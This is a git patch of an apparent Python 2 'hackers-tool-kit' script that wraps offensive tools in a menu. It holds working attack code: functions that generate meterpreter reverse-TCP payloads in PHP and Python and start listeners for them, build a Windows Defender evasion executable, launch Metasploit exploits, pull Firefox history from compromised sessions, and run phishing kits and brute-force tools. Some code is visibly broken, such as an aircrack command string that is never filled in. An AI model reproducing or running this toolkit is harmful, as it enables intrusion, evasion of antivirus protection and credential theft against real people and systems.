hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 0086a763629763f737698d9c2caaf05e78cca22b Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 30 May 2019 02:00:43 +0100 Subject: [PATCH 165/214] Add files via upload --- htk.py | 3151 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3151 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..b9df752 --- /dev/null +++ b/htk.py @@ -0,0 +1,3151 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... 